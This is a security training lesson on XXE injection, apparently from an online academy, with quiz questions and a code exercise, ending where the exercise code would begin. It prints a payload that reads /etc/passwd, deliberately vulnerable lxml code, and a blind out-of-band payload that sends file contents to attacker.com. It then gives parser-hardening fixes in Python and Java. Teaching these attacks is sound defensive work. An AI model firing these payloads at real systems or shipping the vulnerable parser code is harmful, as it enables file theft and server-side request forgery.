Skip to main content

Free 30-min security demo  — We'll scan your real code and show live findings, no commitment Book Now

Offensive360
Academy XXE (XML External Entity) Injection
Advanced · 20 min

XXE (XML External Entity) Injection

Understand how attackers exploit XML parsers to read local files, perform SSRF, and crash servers — and how to disable external entities.

1 How XXE Works

XML External Entity (XXE) injection exploits XML parsers that process external entity references defined in a DOCTYPE declaration. When a parser fetches the entity, it can read local files, make internal network requests, or trigger denial-of-service.

Malicious XML payload reading /etc/passwd:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <name>&xxe;</name>
</root>

When the server parses this, the &xxe; entity is replaced with the contents of /etc/passwd, which then appears in the response or error message.

Vulnerable Python code using lxml:

from lxml import etree

def parse_xml(xml_data):
    root = etree.fromstring(xml_data)  # Dangerous — external entities enabled by default
    return root.find('name').text

XXE can also be used for SSRF — replacing the file:// URL with http:// to reach internal services — and for a Billion Laughs DoS attack via deeply nested entity expansion.

2 Blind XXE via Out-of-Band Channels

Blind XXE occurs when the server does not return the entity contents in the response but the parser still fetches the resource. Attackers use out-of-band (OOB) channels to exfiltrate data.

OOB via parameter entities (DTD on attacker's server):

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<foo/>

The evil.dtd on the attacker's server contains:

<!ENTITY % payload "<!ENTITY exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%payload;

This causes the victim server to DNS-resolve and HTTP-connect to attacker.com, sending the file contents as a query parameter. Even if the application returns nothing, the attacker's server logs reveal the sensitive data.

Error-based XXE: Some parsers include the entity value in error messages. Attackers deliberately craft invalid XML that forces the parser to include the file contents in the error response.

3 Disabling External Entities

The fix is to configure the XML parser to disable external entity processing and DOCTYPE declarations entirely. Most modern parsers support this — it is just not the default.

Python — defusedxml (safest option):

import defusedxml.ElementTree as ET

def parse_xml(xml_data):
    # defusedxml disables all external entities, DTDs, and entity expansion by default
    root = ET.fromstring(xml_data)
    return root.find('name').text

Python — lxml with features disabled:

from lxml import etree

def parse_xml(xml_data):
    parser = etree.XMLParser(
        resolve_entities=False,
        no_network=True,
        load_dtd=False,
        forbid_dtd=True
    )
    root = etree.fromstring(xml_data, parser)
    return root.find('name').text

Java — Disabling external entities (DocumentBuilder):

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
// Disable external entities and DTDs
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
DocumentBuilder builder = dbf.newDocumentBuilder();

Java — XMLConstants for StAX parsers:

XMLInputFactory xif = XMLInputFactory.newInstance();
xif.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
xif.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
xif.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, Boolean.FALSE);

If you do not need XML at all, consider accepting JSON. If XML is required, prefer a SAX parser with these features disabled over a DOM parser, and use defusedxml in Python as it automatically patches the dangerous settings.

Knowledge Check

0/4 correct
Q1

What XML construct does an XXE attack exploit?

Q2

A server parses uploaded XML but never returns the parsed content to the attacker. Can XXE still succeed?

Q3

Which Python library is the safest and easiest fix for XXE?

Q4

What does the Billion Laughs attack use XXE for?

Code Exercise

Fix the XML Parser to Disable External Entities

The function below parses user-supplied XML using lxml with default settings, making it vulnerable to XXE. Fix it by either switching to defusedxml or configuring the lxml parser to disable external entity resolution.

python